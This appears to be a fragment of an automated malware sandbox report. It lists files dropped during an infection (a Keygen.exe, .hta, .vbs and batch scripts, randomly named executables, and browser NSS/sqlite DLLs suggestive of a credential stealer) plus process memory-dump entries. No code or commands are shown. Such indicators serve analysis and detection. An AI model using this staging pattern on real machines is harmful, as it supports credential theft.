            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\Keygen.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\Keygen.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\b.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\b1.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\ba.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\ba1.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\m.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\m1.hta
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A58C.tmp\start.bat
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Gsgxeo.vbs
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Jwoasxr.vbs
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit

            • C:\Users\Public\ltv.exe
              Download Submit

            • C:\Users\Public\ltv.exe
              Download Submit

            • C:\Users\Public\ltv.exe
              Download Submit

            • C:\Users\Public\toi.exe
              Download Submit

            • C:\Users\Public\toi.exe
              Download Submit

            • C:\Users\Public\toi.exe
              Download Submit

            • C:\Users\Public\ucq.exe
              Download Submit

            • C:\Users\Public\ucq.exe
              Download Submit

            • C:\Users\Public\ucq.exe
              Download Submit

            • \ProgramData\mozglue.dll
              Download Submit

            • \ProgramData\mozglue.dll
              Download Submit

            • \ProgramData\mozglue.dll
              Download Submit

            • \ProgramData\nss3.dll
              Download Submit

            • \ProgramData\nss3.dll
              Download Submit

            • \ProgramData\nss3.dll
              Download Submit

            • \ProgramData\sqlite3.dll
              Download Submit

            • \ProgramData\sqlite3.dll
              Download Submit

            • \ProgramData\sqlite3.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              Download Submit

            • \Users\Admin\AppData\LocalLow\sqlite3.dll
              Download Submit

            • memory/184-228-0x0000000000000000-mapping.dmp

              Download

            • memory/192-15-0x0000000000000000-mapping.dmp

              Download

            • memory/1352-19-0x0000000000000000-mapping.dmp

              Download

            • memory/1352-21-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1352-45-0x00000000077A0000-0x00000000077A1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1536-226-0x0000000000000000-mapping.dmp

              Download

            • memory/1624-234-0x0000000000000000-mapping.dmp

              Download

            • memory/1940-57-0x0000000007470000-0x0000000007471000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1940-63-0x00000000074E0000-0x00000000074E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1940-16-0x0000000000000000-mapping.dmp

              Download

            • memory/1940-23-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1940-51-0x0000000006B80000-0x0000000006B81000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2100-20-0x0000000000000000-mapping.dmp

              Download

            • memory/2228-24-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/2228-17-0x0000000000000000-mapping.dmp

              Download

            • memory/2228-81-0x0000000008A50000-0x0000000008A51000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2228-102-0x0000000009CF0000-0x0000000009CF1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2228-27-0x0000000004F60000-0x0000000004F61000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2312-238-0x0000000000000000-mapping.dmp

              Download

            • memory/2444-32-0x0000000000000000-mapping.dmp

              Download

            • memory/2588-146-0x0000000000000000-mapping.dmp

              Download

            • memory/3044-188-0x000000000041A684-mapping.dmp

              Download

            • memory/3068-263-0x000000000041A684-mapping.dmp

              Download

            • memory/3068-262-0x0000000000400000-0x0000000000420000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3068-265-0x0000000000400000-0x0000000000420000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3500-7-0x0000000000000000-mapping.dmp

              Download

            • memory/3600-10-0x0000000000000000-mapping.dmp

              Download

            • memory/3752-38-0x0000000000000000-mapping.dmp

              Download

            • memory/3752-105-0x0000000009FD0000-0x0000000009FD1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3752-99-0x0000000009130000-0x0000000009131000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3752-69-0x0000000007990000-0x0000000007991000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3752-42-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/3792-9-0x0000000000000000-mapping.dmp

              Download

            • memory/3872-0-0x0000000000000000-mapping.dmp

              Download

            • memory/3900-13-0x0000000000000000-mapping.dmp

              Download

            • memory/3904-196-0x0000000000417A8B-mapping.dmp

              Download

            • memory/3904-198-0x0000000000400000-0x0000000000439000-memory.dmp

              Filesize

              228KB

              Download

            • memory/3928-3-0x0000000000000000-mapping.dmp

              Download

            • memory/3928-2-0x0000000000000000-mapping.dmp

              Download

            • memory/3940-26-0x0000000000000000-mapping.dmp

              Download

            • memory/3956-39-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/3956-87-0x0000000009E50000-0x0000000009E51000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3956-37-0x0000000000000000-mapping.dmp

              Download

            • memory/3964-194-0x0000000000400000-0x0000000000439000-memory.dmp

              Filesize

              228KB

              Download

            • memory/3964-185-0x0000000000400000-0x0000000000439000-memory.dmp

              Filesize

              228KB

              Download

            • memory/3964-187-0x0000000000417A8B-mapping.dmp

              Download

            • memory/3968-33-0x00000000078E0000-0x00000000078E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3968-18-0x0000000000000000-mapping.dmp

              Download

            • memory/3968-75-0x0000000008860000-0x0000000008861000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3968-92-0x0000000009450000-0x0000000009451000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3968-22-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/3976-227-0x0000000000000000-mapping.dmp

              Download

            • memory/4212-256-0x0000000000000000-mapping.dmp

              Download

            • memory/4244-243-0x0000000001640000-0x0000000001641000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4244-241-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4244-240-0x0000000070550000-0x0000000070C3E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/4244-260-0x0000000005630000-0x0000000005654000-memory.dmp

              Filesize

              144KB

              Download

            • memory/4244-237-0x0000000000000000-mapping.dmp

              Download

            • memory/4256-166-0x0000000000400000-0x0000000000498000-memory.dmp

              Filesize

              608KB

              Download

            • memory/4256-153-0x0000000000400000-0x0000000000498000-memory.dmp

              Filesize

              608KB

              Download

            • memory/4256-156-0x000000000043FA93-mapping.dmp

              Download

            • memory/4280-158-0x000000000043FA93-mapping.dmp

              Download

            • memory/4280-164-0x0000000000400000-0x0000000000498000-memory.dmp

              Filesize

              608KB

              Download

            • memory/4428-168-0x0000000000000000-mapping.dmp

              Download

            • memory/4552-173-0x0000000000400000-0x0000000000493000-memory.dmp

              Filesize

              588KB

              Download

            • memory/4552-170-0x0000000000400000-0x0000000000493000-memory.dmp

              Filesize

              588KB

              Download

            • memory/4552-171-0x000000000043FA93-mapping.dmp

              Download

            • memory/4564-181-0x0000000003130000-0x0000000003131000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4564-178-0x0000000070950000-0x000000007103E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/4564-176-0x0000000000000000-mapping.dmp

              Download

            • memory/4564-179-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4564-224-0x00000000057B0000-0x0000000005804000-memory.dmp

              Filesize

              336KB

              Download

            • memory/4804-183-0x0000000000400000-0x0000000000425000-memory.dmp

              Filesize

              148KB

              Download

            • memory/4804-186-0x000000000041A684-mapping.dmp

              Download

            • memory/4804-190-0x0000000000400000-0x0000000000425000-memory.dmp

              Filesize

              148KB

              Download

            • memory/4820-120-0x0000000000000000-mapping.dmp

              Download

            • memory/4832-169-0x000000000AA60000-0x000000000AA6C000-memory.dmp

              Filesize

              48KB

              Download

            • memory/4832-124-0x0000000070000000-0x00000000706EE000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/4832-167-0x000000000A890000-0x000000000A945000-memory.dmp

              Filesize

              724KB

              Download

            • memory/4832-131-0x0000000000930000-0x0000000000931000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4832-138-0x0000000002C20000-0x0000000002C21000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4832-119-0x0000000000000000-mapping.dmp

              Download

            • memory/4852-121-0x0000000000000000-mapping.dmp

              Download

            • memory/4992-233-0x0000000000400000-0x0000000000434000-memory.dmp

              Filesize

              208KB

              Download

            • memory/4992-230-0x0000000000400000-0x0000000000434000-memory.dmp

              Filesize

              208KB

              Download

            • memory/4992-231-0x0000000000417A8B-mapping.dmp

              Download

            • memory/5072-141-0x0000000000000000-mapping.dmp

              Download

            • memory/5084-142-0x0000000000000000-mapping.dmp

              Download

            • memory/5088-251-0x0000000000000000-mapping.dmp

              Download

            • memory/5108-144-0x0000000000000000-mapping.dmp

              Download